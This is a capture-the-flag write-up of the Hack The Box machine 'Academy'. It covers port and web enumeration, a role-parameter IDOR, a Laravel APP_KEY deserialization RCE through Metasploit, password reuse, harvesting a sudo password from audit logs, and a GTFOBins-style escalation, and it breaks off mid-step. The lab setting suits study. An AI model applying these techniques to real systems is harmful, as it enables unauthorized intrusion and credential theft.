- Name: Academy
- Profile: www.hackthebox.eu
- Difficulty: Easy
- OS: Linux
- Points: 20
Install tools used in this WU on BlackArch Linux:
$ sudo pacman -S nmap ffuf metasploit gtfoblookup
Port and service discovery scan with nmap:
# Nmap 7.91 scan initiated Tue Feb 2 18:57:09 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.10.215
$ cat /etc/hosts | grep academy
Let's start with the web port but let's keep in mind that we have a weird 33060 port.
We can register and login at http://academy.htb/. But there is not much to see there.
So let's enumerate with ffuf:
$ ffuf -u http://academy.htb/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-small-files-lowercase.txt -fc 403
We notice there is an admin page.
Web exploitation: IDOR#
When registering there is a param
roleid, if we change it from zero (user) to
one (admin), we will maybe get an admin account.
POST /register.php HTTP/1.1
Then we can login at http://academy.htb/admin.php. If you let
roleid=0 you can't.
On the admin dashboard there is a todolist with a status.
|Complete initial set of modules (cry0l1t3 / mrb3n)||done|
|Finalize website design||done|
|Test all modules||done|
|Prepare launch campaign||done|
|Separate student and admin roles||done|
|Fix issue with dev-staging-01.academy.htb||pending|
Let's add the new subdomain to our host file.
$ cat /etc/hosts | grep academy
Web exploitation: Laravel RCE and debug mode#
Let's go at: http://dev-staging-01.academy.htb/
We are welcomed by a laravel debugger.
Here we have a bunch of environment variables leaking secrets:
By searching for
laravel api key exploit I found this
The RCE exploit requires the APP_KEY but we just get it through the leak.
msf6 exploit(unix/http/laravel_token_unserialize_exec) > options
Elevation of Privilege (EoP): from www-data to cry0l1t3#
First let's get a full TTY.
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
There are plenty users we could target:
www-data@academy:/var/www/html/htb-academy-dev-01/public$ cat /etc/passwd
Then I ran a recursive list in the home directories:
ls -lhAR /home.
- 21y4d: empty
- ch4p: empty
- cry0l1t3: the user flag is there, and stuff about lxd (useful for EoP)
/home/cry0l1t3/.mysql_history-> we don't have the permission
- egre55: empty
- g0blin: empty
- mrb3n: dirty stuff
/home/mrb3n/.config/composer/.htaccess-> deny from all
/home/mrb3n/.local/share/composer/.htaccess-> deny from all
Connecting to the DB fails with mysql creds found in
/var/www/html/htb-academy-dev-01/.env (same as the Laravel):
But with the ones
No luck either.
But I tried to reused the password
mySup3rP4s5w0rd!! with user
it worked (remember he had a
.mysql_history in his home).
$ cat user.txt
Elevation of Privilege (EoP): from cry0l1t3 to mrb3n#
As we are in
adm group I launched a command to see what files
we have access with this group:
find / -group adm -type f 2>/dev/null.
We have access to all logs in
There are some interesting files but password are redacted.
$ grep -ri password /var/log 2>/dev/null
It's possible that
/var/log/audit/audit.log is logging password during auth attempts.
$ grep -r 'comm="sudo"' /var/log/audit
The password is hexadecimal encoded.
$ printf %s '6D7262336E5F41634064336D79210A' | xxd -r -p
Elevation of Privilege (EoP): from mrb3n to mrb3n#
mrb3n is a sudoer:
$ su mrb3n
So let's check a GTFO for that one:
$ gtfoblookup update
So let's do that:
$ TF=$(mktemp -d)